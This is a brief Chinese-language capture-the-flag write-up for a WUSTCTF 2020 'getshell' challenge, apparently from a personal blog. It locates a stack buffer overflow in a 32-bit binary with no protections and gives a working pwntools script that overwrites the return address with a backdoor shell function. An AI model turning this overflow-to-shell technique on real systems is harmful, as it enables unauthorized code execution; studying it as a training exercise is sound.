先分析一下,32位程序,无保护,可执行
用IDA分析,发现buf存在泄露点
shell函数存在后门,在0x0804851B
计算一下长度,0x18+0x4=0x1C
构造exp如下
from pwn import *
filename = "./pwn"
p = remote("", )
shell = 0x0804851B
payload = b'a'*0x1C + p32(shell)
p.sendline(payload)
p.interactive()
标签:getshell,shell,2020,0x0804851B,WUSTCTF,0x1C,payload From: https://www.cnblogs.com/zackmount/p/16896033.html